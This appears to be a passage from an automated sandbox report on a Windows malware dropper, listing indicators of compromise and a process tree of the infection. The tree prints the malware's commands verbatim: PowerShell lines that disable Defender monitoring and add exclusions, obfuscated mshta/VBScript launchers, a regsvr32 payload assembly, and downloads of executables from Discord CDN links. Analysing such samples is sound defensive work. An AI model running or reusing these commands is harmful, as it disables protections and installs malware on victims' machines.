6156	msedge.exe
6156	msedge.exe
6156	msedge.exe
6156	msedge.exe
6156	msedge.exe
6156	msedge.exe
6156	msedge.exe
6156	msedge.exe
6156	msedge.exe
6156	msedge.exe
6156	msedge.exe
6156	msedge.exe
6156	msedge.exe
6156	msedge.exe
6156	msedge.exe
6156	msedge.exe
6156	msedge.exe
6156	msedge.exe
6156	msedge.exe
6156	msedge.exe
6156	msedge.exe
6156	msedge.exe
6156	msedge.exe
6156	msedge.exe
6156	msedge.exe
6156	msedge.exe
6156	msedge.exe
6156	msedge.exe
6156	msedge.exe
6156	msedge.exe
6156	msedge.exe
6156	msedge.exe
6156	msedge.exe
6156	msedge.exe
6156	msedge.exe

Suspicious behavior: SetClipboardViewer 2 IoCs

Processes:

WinHoster.execli.exe

pid process

5900 WinHoster.exe
2964 cli.exe

pid	process
5900	WinHoster.exe
2964	cli.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

Mon17870faab0.exeMon178d8e5d06822.exeMon17332e41e6b.exepowershell.exepowershell.exeDownFlSetup110.exetaskkill.exechrome.exeQFWlN69O9FNkcWfwdW6z88Ve.exe

description	pid	process
Token: SeCreateTokenPrivilege	4040	Mon17870faab0.exe
Token: SeAssignPrimaryTokenPrivilege	4040	Mon17870faab0.exe
Token: SeLockMemoryPrivilege	4040	Mon17870faab0.exe
Token: SeIncreaseQuotaPrivilege	4040	Mon17870faab0.exe
Token: SeMachineAccountPrivilege	4040	Mon17870faab0.exe
Token: SeTcbPrivilege	4040	Mon17870faab0.exe
Token: SeSecurityPrivilege	4040	Mon17870faab0.exe
Token: SeTakeOwnershipPrivilege	4040	Mon17870faab0.exe
Token: SeLoadDriverPrivilege	4040	Mon17870faab0.exe
Token: SeSystemProfilePrivilege	4040	Mon17870faab0.exe
Token: SeSystemtimePrivilege	4040	Mon17870faab0.exe
Token: SeProfSingleProcessPrivilege	4040	Mon17870faab0.exe
Token: SeIncBasePriorityPrivilege	4040	Mon17870faab0.exe
Token: SeCreatePagefilePrivilege	4040	Mon17870faab0.exe
Token: SeCreatePermanentPrivilege	4040	Mon17870faab0.exe
Token: SeBackupPrivilege	4040	Mon17870faab0.exe
Token: SeRestorePrivilege	4040	Mon17870faab0.exe
Token: SeShutdownPrivilege	4040	Mon17870faab0.exe
Token: SeDebugPrivilege	4040	Mon17870faab0.exe
Token: SeAuditPrivilege	4040	Mon17870faab0.exe
Token: SeSystemEnvironmentPrivilege	4040	Mon17870faab0.exe
Token: SeChangeNotifyPrivilege	4040	Mon17870faab0.exe
Token: SeRemoteShutdownPrivilege	4040	Mon17870faab0.exe
Token: SeUndockPrivilege	4040	Mon17870faab0.exe
Token: SeSyncAgentPrivilege	4040	Mon17870faab0.exe
Token: SeEnableDelegationPrivilege	4040	Mon17870faab0.exe
Token: SeManageVolumePrivilege	4040	Mon17870faab0.exe
Token: SeImpersonatePrivilege	4040	Mon17870faab0.exe
Token: SeCreateGlobalPrivilege	4040	Mon17870faab0.exe
Token: 31	4040	Mon17870faab0.exe
Token: 32	4040	Mon17870faab0.exe
Token: 33	4040	Mon17870faab0.exe
Token: 34	4040	Mon17870faab0.exe
Token: 35	4040	Mon17870faab0.exe
Token: SeDebugPrivilege	1260	Mon178d8e5d06822.exe
Token: SeDebugPrivilege	720	Mon17332e41e6b.exe
Token: SeDebugPrivilege	1560	powershell.exe
Token: SeDebugPrivilege	1540	powershell.exe
Token: SeDebugPrivilege	4788	DownFlSetup110.exe
Token: SeDebugPrivilege	5196	taskkill.exe
Token: SeDebugPrivilege	5544	chrome.exe
Token: SeCreateTokenPrivilege	5156	QFWlN69O9FNkcWfwdW6z88Ve.exe
Token: SeAssignPrimaryTokenPrivilege	5156	QFWlN69O9FNkcWfwdW6z88Ve.exe
Token: SeLockMemoryPrivilege	5156	QFWlN69O9FNkcWfwdW6z88Ve.exe
Token: SeIncreaseQuotaPrivilege	5156	QFWlN69O9FNkcWfwdW6z88Ve.exe
Token: SeMachineAccountPrivilege	5156	QFWlN69O9FNkcWfwdW6z88Ve.exe
Token: SeTcbPrivilege	5156	QFWlN69O9FNkcWfwdW6z88Ve.exe
Token: SeSecurityPrivilege	5156	QFWlN69O9FNkcWfwdW6z88Ve.exe
Token: SeTakeOwnershipPrivilege	5156	QFWlN69O9FNkcWfwdW6z88Ve.exe
Token: SeLoadDriverPrivilege	5156	QFWlN69O9FNkcWfwdW6z88Ve.exe
Token: SeSystemProfilePrivilege	5156	QFWlN69O9FNkcWfwdW6z88Ve.exe
Token: SeSystemtimePrivilege	5156	QFWlN69O9FNkcWfwdW6z88Ve.exe
Token: SeProfSingleProcessPrivilege	5156	QFWlN69O9FNkcWfwdW6z88Ve.exe
Token: SeIncBasePriorityPrivilege	5156	QFWlN69O9FNkcWfwdW6z88Ve.exe
Token: SeCreatePagefilePrivilege	5156	QFWlN69O9FNkcWfwdW6z88Ve.exe
Token: SeCreatePermanentPrivilege	5156	QFWlN69O9FNkcWfwdW6z88Ve.exe
Token: SeBackupPrivilege	5156	QFWlN69O9FNkcWfwdW6z88Ve.exe
Token: SeRestorePrivilege	5156	QFWlN69O9FNkcWfwdW6z88Ve.exe
Token: SeShutdownPrivilege	5156	QFWlN69O9FNkcWfwdW6z88Ve.exe
Token: SeDebugPrivilege	5156	QFWlN69O9FNkcWfwdW6z88Ve.exe
Token: SeAuditPrivilege	5156	QFWlN69O9FNkcWfwdW6z88Ve.exe
Token: SeSystemEnvironmentPrivilege	5156	QFWlN69O9FNkcWfwdW6z88Ve.exe
Token: SeChangeNotifyPrivilege	5156	QFWlN69O9FNkcWfwdW6z88Ve.exe
Token: SeRemoteShutdownPrivilege	5156	QFWlN69O9FNkcWfwdW6z88Ve.exe

Suspicious use of FindShellTrayWindow 64 IoCs

Processes:

Mon17bbf11fdb575d.tmpinstaller.exemsedge.exeCalculator.exeExplorer.EXEsetting.exeinstaller.exevpn.tmp

pid	process
2148	Mon17bbf11fdb575d.tmp
3236	installer.exe
6156	msedge.exe
8576	Calculator.exe
3196	Explorer.EXE
5980	setting.exe
7244	installer.exe
1528	vpn.tmp
1528	vpn.tmp
1528	vpn.tmp
1528	vpn.tmp
1528	vpn.tmp
1528	vpn.tmp
1528	vpn.tmp
1528	vpn.tmp
1528	vpn.tmp
1528	vpn.tmp
1528	vpn.tmp
1528	vpn.tmp
1528	vpn.tmp
1528	vpn.tmp
1528	vpn.tmp
1528	vpn.tmp
1528	vpn.tmp
1528	vpn.tmp
1528	vpn.tmp
1528	vpn.tmp
1528	vpn.tmp
1528	vpn.tmp
1528	vpn.tmp
1528	vpn.tmp
1528	vpn.tmp
1528	vpn.tmp
1528	vpn.tmp
1528	vpn.tmp
1528	vpn.tmp
1528	vpn.tmp
1528	vpn.tmp
1528	vpn.tmp
1528	vpn.tmp
1528	vpn.tmp
1528	vpn.tmp
1528	vpn.tmp
1528	vpn.tmp
1528	vpn.tmp
1528	vpn.tmp
1528	vpn.tmp
1528	vpn.tmp
1528	vpn.tmp
1528	vpn.tmp
1528	vpn.tmp
1528	vpn.tmp
1528	vpn.tmp
1528	vpn.tmp
1528	vpn.tmp
1528	vpn.tmp
1528	vpn.tmp
1528	vpn.tmp
1528	vpn.tmp
1528	vpn.tmp
1528	vpn.tmp
1528	vpn.tmp
1528	vpn.tmp
1528	vpn.tmp

Suspicious use of SendNotifyMessage 64 IoCs

Processes:

Explorer.EXE

pid	process
3196	Explorer.EXE
3196	Explorer.EXE
3196	Explorer.EXE
3196	Explorer.EXE
3196	Explorer.EXE
3196	Explorer.EXE
3196	Explorer.EXE
3196	Explorer.EXE
3196	Explorer.EXE
3196	Explorer.EXE
3196	Explorer.EXE
3196	Explorer.EXE
3196	Explorer.EXE
3196	Explorer.EXE
3196	Explorer.EXE
3196	Explorer.EXE
3196	Explorer.EXE
3196	Explorer.EXE
3196	Explorer.EXE
3196	Explorer.EXE
3196	Explorer.EXE
3196	Explorer.EXE
3196	Explorer.EXE
3196	Explorer.EXE
3196	Explorer.EXE
3196	Explorer.EXE
3196	Explorer.EXE
3196	Explorer.EXE
3196	Explorer.EXE
3196	Explorer.EXE
3196	Explorer.EXE
3196	Explorer.EXE
3196	Explorer.EXE
3196	Explorer.EXE
3196	Explorer.EXE
3196	Explorer.EXE
3196	Explorer.EXE
3196	Explorer.EXE
3196	Explorer.EXE
3196	Explorer.EXE
3196	Explorer.EXE
3196	Explorer.EXE
3196	Explorer.EXE
3196	Explorer.EXE
3196	Explorer.EXE
3196	Explorer.EXE
3196	Explorer.EXE
3196	Explorer.EXE
3196	Explorer.EXE
3196	Explorer.EXE
3196	Explorer.EXE
3196	Explorer.EXE
3196	Explorer.EXE
3196	Explorer.EXE
3196	Explorer.EXE
3196	Explorer.EXE
3196	Explorer.EXE
3196	Explorer.EXE
3196	Explorer.EXE
3196	Explorer.EXE
3196	Explorer.EXE
3196	Explorer.EXE
3196	Explorer.EXE
3196	Explorer.EXE

Suspicious use of SetWindowsHookEx 17 IoCs

Processes:

Explorer.EXEPOWERPNT.EXEWINWORD.EXEcmd.execmd.exeMaskVPNUpdate.exe

pid	process
3196	Explorer.EXE
7032	POWERPNT.EXE
5380	WINWORD.EXE
7032	POWERPNT.EXE
7032	POWERPNT.EXE
7032	POWERPNT.EXE
5380	WINWORD.EXE
5380	WINWORD.EXE
5380	WINWORD.EXE
7032	POWERPNT.EXE
7032	POWERPNT.EXE
5380	WINWORD.EXE
5380	WINWORD.EXE
5380	WINWORD.EXE
7160	cmd.exe
5888	cmd.exe
5968	MaskVPNUpdate.exe

Suspicious use of UnmapMainImage 1 IoCs

Processes:

Explorer.EXE

pid process

3196 Explorer.EXE

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

setup_x86_x64_install.exesetup_installer.exesetup_install.execmd.execmd.execmd.execmd.exe

description	pid	process	target process
PID 568 wrote to memory of 1692	568	setup_x86_x64_install.exe	setup_installer.exe
PID 568 wrote to memory of 1692	568	setup_x86_x64_install.exe	setup_installer.exe
PID 568 wrote to memory of 1692	568	setup_x86_x64_install.exe	setup_installer.exe
PID 1692 wrote to memory of 2488	1692	setup_installer.exe	setup_install.exe
PID 1692 wrote to memory of 2488	1692	setup_installer.exe	setup_install.exe
PID 1692 wrote to memory of 2488	1692	setup_installer.exe	setup_install.exe
PID 2488 wrote to memory of 2204	2488	setup_install.exe	cmd.exe
PID 2488 wrote to memory of 2204	2488	setup_install.exe	cmd.exe
PID 2488 wrote to memory of 2204	2488	setup_install.exe	cmd.exe
PID 2488 wrote to memory of 1292	2488	setup_install.exe	cmd.exe
PID 2488 wrote to memory of 1292	2488	setup_install.exe	cmd.exe
PID 2488 wrote to memory of 1292	2488	setup_install.exe	cmd.exe
PID 1292 wrote to memory of 1540	1292	cmd.exe	powershell.exe
PID 1292 wrote to memory of 1540	1292	cmd.exe	powershell.exe
PID 1292 wrote to memory of 1540	1292	cmd.exe	powershell.exe
PID 2204 wrote to memory of 1560	2204	cmd.exe	powershell.exe
PID 2204 wrote to memory of 1560	2204	cmd.exe	powershell.exe
PID 2204 wrote to memory of 1560	2204	cmd.exe	powershell.exe
PID 2488 wrote to memory of 1440	2488	setup_install.exe	cmd.exe
PID 2488 wrote to memory of 1440	2488	setup_install.exe	cmd.exe
PID 2488 wrote to memory of 1440	2488	setup_install.exe	cmd.exe
PID 2488 wrote to memory of 1580	2488	setup_install.exe	cmd.exe
PID 2488 wrote to memory of 1580	2488	setup_install.exe	cmd.exe
PID 2488 wrote to memory of 1580	2488	setup_install.exe	cmd.exe
PID 2488 wrote to memory of 2972	2488	setup_install.exe	cmd.exe
PID 2488 wrote to memory of 2972	2488	setup_install.exe	cmd.exe
PID 2488 wrote to memory of 2972	2488	setup_install.exe	cmd.exe
PID 2488 wrote to memory of 1820	2488	setup_install.exe	cmd.exe
PID 2488 wrote to memory of 1820	2488	setup_install.exe	cmd.exe
PID 2488 wrote to memory of 1820	2488	setup_install.exe	cmd.exe
PID 2488 wrote to memory of 2168	2488	setup_install.exe	cmd.exe
PID 2488 wrote to memory of 2168	2488	setup_install.exe	cmd.exe
PID 2488 wrote to memory of 2168	2488	setup_install.exe	cmd.exe
PID 2488 wrote to memory of 444	2488	setup_install.exe	cmd.exe
PID 2488 wrote to memory of 444	2488	setup_install.exe	cmd.exe
PID 2488 wrote to memory of 444	2488	setup_install.exe	cmd.exe
PID 2488 wrote to memory of 2084	2488	setup_install.exe	cmd.exe
PID 2488 wrote to memory of 2084	2488	setup_install.exe	cmd.exe
PID 2488 wrote to memory of 2084	2488	setup_install.exe	cmd.exe
PID 2488 wrote to memory of 2264	2488	setup_install.exe	cmd.exe
PID 2488 wrote to memory of 2264	2488	setup_install.exe	cmd.exe
PID 2488 wrote to memory of 2264	2488	setup_install.exe	cmd.exe
PID 2488 wrote to memory of 5024	2488	setup_install.exe	cmd.exe
PID 2488 wrote to memory of 5024	2488	setup_install.exe	cmd.exe
PID 2488 wrote to memory of 5024	2488	setup_install.exe	cmd.exe
PID 1580 wrote to memory of 3176	1580	cmd.exe	Mon178e7a516181.exe
PID 1580 wrote to memory of 3176	1580	cmd.exe	Mon178e7a516181.exe
PID 1580 wrote to memory of 3176	1580	cmd.exe	Mon178e7a516181.exe
PID 2488 wrote to memory of 3352	2488	setup_install.exe	cmd.exe
PID 2488 wrote to memory of 3352	2488	setup_install.exe	cmd.exe
PID 2488 wrote to memory of 3352	2488	setup_install.exe	cmd.exe
PID 1440 wrote to memory of 4040	1440	cmd.exe	Mon17870faab0.exe
PID 1440 wrote to memory of 4040	1440	cmd.exe	Mon17870faab0.exe
PID 1440 wrote to memory of 4040	1440	cmd.exe	Mon17870faab0.exe
PID 2488 wrote to memory of 2808	2488	setup_install.exe	cmd.exe
PID 2488 wrote to memory of 2808	2488	setup_install.exe	cmd.exe
PID 2488 wrote to memory of 2808	2488	setup_install.exe	cmd.exe
PID 2488 wrote to memory of 3684	2488	setup_install.exe	cmd.exe
PID 2488 wrote to memory of 3684	2488	setup_install.exe	cmd.exe
PID 2488 wrote to memory of 3684	2488	setup_install.exe	cmd.exe
PID 2488 wrote to memory of 3676	2488	setup_install.exe	cmd.exe
PID 2488 wrote to memory of 3676	2488	setup_install.exe	cmd.exe
PID 2488 wrote to memory of 3676	2488	setup_install.exe	cmd.exe
PID 2488 wrote to memory of 3988	2488	setup_install.exe	cmd.exe

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
- Suspicious use of UnmapMainImage
PID:3196

C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe
"C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"
2⤵
- Suspicious use of WriteProcessMemory
PID:568

C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1692

C:\Users\Admin\AppData\Local\Temp\7zSC963FAD3\setup_install.exe
"C:\Users\Admin\AppData\Local\Temp\7zSC963FAD3\setup_install.exe"
4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2488

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
5⤵
- Suspicious use of WriteProcessMemory
PID:1292

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1540

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
5⤵
- Suspicious use of WriteProcessMemory
PID:2204

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1560

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Mon175e6c8b40064b8c8.exe
5⤵
PID:2972

C:\Users\Admin\AppData\Local\Temp\7zSC963FAD3\Mon175e6c8b40064b8c8.exe
Mon175e6c8b40064b8c8.exe
6⤵
- Executes dropped EXE
PID:1320

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vBscRipT: ClOSe( crEatEobJECt ("wSCRIPT.SHEll" ).rUn ( "CMd.eXE /R tYpE ""C:\Users\Admin\AppData\Local\Temp\7zSC963FAD3\Mon175e6c8b40064b8c8.exe"" > 6jZhRtW.EXe &&start 6jZHRTW.EXe /p5WmgTwUrhSt5mLQDQ6uTWAP3bAjNt & if """" == """" for %U In ( ""C:\Users\Admin\AppData\Local\Temp\7zSC963FAD3\Mon175e6c8b40064b8c8.exe"" ) do taskkill -Im ""%~NxU"" -f " , 0 , tRUE ))
7⤵
PID:1412

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /R tYpE "C:\Users\Admin\AppData\Local\Temp\7zSC963FAD3\Mon175e6c8b40064b8c8.exe" > 6jZhRtW.EXe &&start 6jZHRTW.EXe /p5WmgTwUrhSt5mLQDQ6uTWAP3bAjNt & if ""== "" for %U In ( "C:\Users\Admin\AppData\Local\Temp\7zSC963FAD3\Mon175e6c8b40064b8c8.exe") do taskkill -Im "%~NxU" -f
8⤵
PID:4940

C:\Users\Admin\AppData\Local\Temp\6jZhRtW.EXe
6jZHRTW.EXe /p5WmgTwUrhSt5mLQDQ6uTWAP3bAjNt
9⤵
- Executes dropped EXE
PID:4436

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vBscRipT: ClOSe( crEatEobJECt ("wSCRIPT.SHEll" ).rUn ( "CMd.eXE /R tYpE ""C:\Users\Admin\AppData\Local\Temp\6jZhRtW.EXe"" > 6jZhRtW.EXe &&start 6jZHRTW.EXe /p5WmgTwUrhSt5mLQDQ6uTWAP3bAjNt & if ""/p5WmgTwUrhSt5mLQDQ6uTWAP3bAjNt "" == """" for %U In ( ""C:\Users\Admin\AppData\Local\Temp\6jZhRtW.EXe"" ) do taskkill -Im ""%~NxU"" -f " , 0 , tRUE ))
10⤵
PID:1900

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /R tYpE "C:\Users\Admin\AppData\Local\Temp\6jZhRtW.EXe" > 6jZhRtW.EXe &&start 6jZHRTW.EXe /p5WmgTwUrhSt5mLQDQ6uTWAP3bAjNt & if "/p5WmgTwUrhSt5mLQDQ6uTWAP3bAjNt "== "" for %U In ( "C:\Users\Admin\AppData\Local\Temp\6jZhRtW.EXe") do taskkill -Im "%~NxU" -f
11⤵
PID:5532

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vBsCrIpT: cLOse (CrEATEOBJECT ( "wScrIpT.ShelL"). RUn( "cMd /Q /R eCHO | SET /P = ""MZ"" > 1oZVDA.JaC & CoPy /y /b 1OZVDA.jAC+ GjuW~.A +HPIuT6.AM +bDJeH5.9 yLIh.BIn & Del GJuW~.A HPIUT6.AM BDJEH5.9 1oZVDA.jaC& stArt regsvr32.exe /S YLIH.bIN " , 0 ,TRuE) )
10⤵
PID:1452

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /Q /R eCHO | SET /P = "MZ" > 1oZVDA.JaC &CoPy /y /b 1OZVDA.jAC+ GjuW~.A +HPIuT6.AM +bDJeH5.9 yLIh.BIn & Del GJuW~.A HPIUT6.AM BDJEH5.9 1oZVDA.jaC& stArt regsvr32.exe /S YLIH.bIN
11⤵
PID:6600

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" SET /P = "MZ" 1>1oZVDA.JaC"
12⤵
PID:6456

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" eCHO "
12⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:6596

C:\Windows\SysWOW64\regsvr32.exe
regsvr32.exe /S YLIH.bIN
12⤵
- Loads dropped DLL
PID:5364

C:\Windows\SysWOW64\taskkill.exe
taskkill -Im "Mon175e6c8b40064b8c8.exe" -f
9⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5196

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Mon178e7a516181.exe
5⤵
- Suspicious use of WriteProcessMemory
PID:1580

C:\Users\Admin\AppData\Local\Temp\7zSC963FAD3\Mon178e7a516181.exe
Mon178e7a516181.exe
6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:3176

C:\Users\Admin\Pictures\Adobe Films\jc291e2_rKmoNAGsejPpE0Eu.exe
"C:\Users\Admin\Pictures\Adobe Films\jc291e2_rKmoNAGsejPpE0Eu.exe"
7⤵
- Executes dropped EXE
PID:2784

C:\Users\Admin\Pictures\Adobe Films\AHF75qBjiaQYz2D8BbekPx7V.exe
"C:\Users\Admin\Pictures\Adobe Films\AHF75qBjiaQYz2D8BbekPx7V.exe"
7⤵
PID:5592

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5592 -s 280
8⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:6932

C:\Users\Admin\Pictures\Adobe Films\_sJy72r15Io8hjMOpXHU3ng5.exe
"C:\Users\Admin\Pictures\Adobe Films\_sJy72r15Io8hjMOpXHU3ng5.exe"
7⤵
- Executes dropped EXE
PID:5580

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\7A94.tmp\7A95.tmp\7A96.bat "C:\Users\Admin\Pictures\Adobe Films\_sJy72r15Io8hjMOpXHU3ng5.exe""
8⤵
PID:5400

C:\Users\Admin\AppData\Local\Temp\7A94.tmp\7A95.tmp\extd.exe
C:\Users\Admin\AppData\Local\Temp\7A94.tmp\7A95.tmp\extd.exe "/hideself" "" "" "" "" "" "" "" ""
9⤵
PID:3672

C:\Users\Admin\AppData\Local\Temp\7A94.tmp\7A95.tmp\extd.exe
C:\Users\Admin\AppData\Local\Temp\7A94.tmp\7A95.tmp\extd.exe "/download" "https://cdn.discordapp.com/attachments/904754246044495955/904754480883597312/18.exe" "18.exe" "" "" "" "" "" ""
9⤵
PID:6388

C:\Users\Admin\AppData\Local\Temp\7A94.tmp\7A95.tmp\extd.exe
C:\Users\Admin\AppData\Local\Temp\7A94.tmp\7A95.tmp\extd.exe "/download" "https://cdn.discordapp.com/attachments/904754246044495955/904754503507652688/Transmissibility.exe" "Transmissibility.exe" "" "" "" "" "" ""
9⤵
PID:7144

C:\Users\Admin\AppData\Local\Temp\6148\18.exe
18.exe
9⤵
PID:6672

C:\Users\Admin\AppData\Local\Temp\6148\Transmissibility.exe
Transmissibility.exe
9⤵
PID:6728

C:\Users\Admin\AppData\Local\Temp\7A94.tmp\7A95.tmp\extd.exe
C:\Users\Admin\AppData\Local\Temp\7A94.tmp\7A95.tmp\extd.exe "" "" "" "" "" "" "" "" ""
9⤵
PID:1280

C:\Users\Admin\Pictures\Adobe Films\GUJG8vfRqogim7xN2gxq4qxO.exe
"C:\Users\Admin\Pictures\Adobe Films\GUJG8vfRqogim7xN2gxq4qxO.exe"
7⤵
- Executes dropped EXE
PID:5672

C:\Users\Admin\Pictures\Adobe Films\yOj1WECF7HJNMLcwMO9spdy6.exe
"C:\Users\Admin\Pictures\Adobe Films\yOj1WECF7HJNMLcwMO9spdy6.exe"
7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:5660

C:\Users\Admin\Pictures\Adobe Films\yOj1WECF7HJNMLcwMO9spdy6.exe
"C:\Users\Admin\Pictures\Adobe Films\yOj1WECF7HJNMLcwMO9spdy6.exe"
8⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:6424

C:\Users\Admin\Pictures\Adobe Films\_6or44rEubg9iZ3VdoaC4XXg.exe
"C:\Users\Admin\Pictures\Adobe Films\_6or44rEubg9iZ3VdoaC4XXg.exe"
7⤵
- Executes dropped EXE
PID:5724

C:\Program Files (x86)\Company\NewProduct\jg1_1faf.exe
"C:\Program Files (x86)\Company\NewProduct\jg1_1faf.exe"
8⤵
- Checks whether UAC is enabled
- Drops file in Program Files directory
PID:6108

C:\Program Files (x86)\Company\NewProduct\cutm3.exe
"C:\Program Files (x86)\Company\NewProduct\cutm3.exe"
8⤵
PID:3584

C:\Users\Admin\Pictures\Adobe Films\LsXhmWcRgskvDtebvUlqF8rc.exe
"C:\Users\Admin\Pictures\Adobe Films\LsXhmWcRgskvDtebvUlqF8rc.exe"
7⤵
PID:5700

C:\Users\Admin\Documents\F0fWXNnxZj_qi5nVpm1Or_a1.exe
"C:\Users\Admin\Documents\F0fWXNnxZj_qi5nVpm1Or_a1.exe"
8⤵
PID:5508

C:\Users\Admin\Pictures\Adobe Films\Of4nZ0FL0XbjbxcTg06N2AnL.exe
"C:\Users\Admin\Pictures\Adobe Films\Of4nZ0FL0XbjbxcTg06N2AnL.exe"
9⤵
PID:5180

C:\Users\Admin\Pictures\Adobe Films\i8hX2rb2gYWCXaUEOy3W51c_.exe
"C:\Users\Admin\Pictures\Adobe Films\i8hX2rb2gYWCXaUEOy3W51c_.exe"
9⤵
PID:7028

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ).Run ( "cmd /R cOpY /Y ""C:\Users\Admin\Pictures\Adobe Films\i8hX2rb2gYWCXaUEOy3W51c_.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If """" == """" for %M in (""C:\Users\Admin\Pictures\Adobe Films\i8hX2rb2gYWCXaUEOy3W51c_.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )
10⤵
PID:1496

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\Pictures\Adobe Films\i8hX2rb2gYWCXaUEOy3W51c_.exe" ..\kPBhgOaGQk.exe&&sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If ""=="" for %M in ("C:\Users\Admin\Pictures\Adobe Films\i8hX2rb2gYWCXaUEOy3W51c_.exe" ) do taskkill -f -iM "%~NxM"
11⤵
PID:4464

C:\Windows\SysWOW64\taskkill.exe
taskkill -f -iM "i8hX2rb2gYWCXaUEOy3W51c_.exe"
12⤵
- Kills process with taskkill
PID:4364

C:\Users\Admin\Pictures\Adobe Films\g9U1TvOlr23mshzHuzw4pCwB.exe
"C:\Users\Admin\Pictures\Adobe Films\g9U1TvOlr23mshzHuzw4pCwB.exe"
9⤵
PID:3524

C:\Users\Admin\Pictures\Adobe Films\OK6ax4jKjeyJy3ge9otTRApn.exe
"C:\Users\Admin\Pictures\Adobe Films\OK6ax4jKjeyJy3ge9otTRApn.exe"
9⤵
PID:6612

C:\Users\Admin\Pictures\Adobe Films\OK6ax4jKjeyJy3ge9otTRApn.exe
"C:\Users\Admin\Pictures\Adobe Films\OK6ax4jKjeyJy3ge9otTRApn.exe" -u
10⤵
PID:7080

C:\Users\Admin\Pictures\Adobe Films\0fFanJEm3W2BLsRLXOPRYqYY.exe
"C:\Users\Admin\Pictures\Adobe Films\0fFanJEm3W2BLsRLXOPRYqYY.exe"
9⤵
PID:4964

C:\Users\Admin\Pictures\Adobe Films\neCuj2trzULeCoH07fFT9rBD.exe
"C:\Users\Admin\Pictures\Adobe Films\neCuj2trzULeCoH07fFT9rBD.exe"
9⤵
PID:4680

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4680 -s 240
10⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:3708

C:\Users\Admin\Pictures\Adobe Films\UlBX2Ub5Zbv6MawSefADY4uU.exe
"C:\Users\Admin\Pictures\Adobe Films\UlBX2Ub5Zbv6MawSefADY4uU.exe"
9⤵
PID:5012

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5012 -s 240
10⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:6484

C:\Users\Admin\Pictures\Adobe Films\WBqf1wfQKQCPMmZBP5wnAft8.exe
"C:\Users\Admin\Pictures\Adobe Films\WBqf1wfQKQCPMmZBP5wnAft8.exe"
9⤵
PID:2100

C:\Users\Admin\AppData\Local\Temp\is-PGC87.tmp\WBqf1wfQKQCPMmZBP5wnAft8.tmp
"C:\Users\Admin\AppData\Local\Temp\is-PGC87.tmp\WBqf1wfQKQCPMmZBP5wnAft8.tmp" /SL5="$602F2,506127,422400,C:\Users\Admin\Pictures\Adobe Films\WBqf1wfQKQCPMmZBP5wnAft8.exe"
10⤵
- Loads dropped DLL
PID:5500

C:\Users\Admin\AppData\Local\Temp\is-EJGDS.tmp\DYbALA.exe
"C:\Users\Admin\AppData\Local\Temp\is-EJGDS.tmp\DYbALA.exe" /S /UID=2709
11⤵
- Drops file in Drivers directory
PID:1456

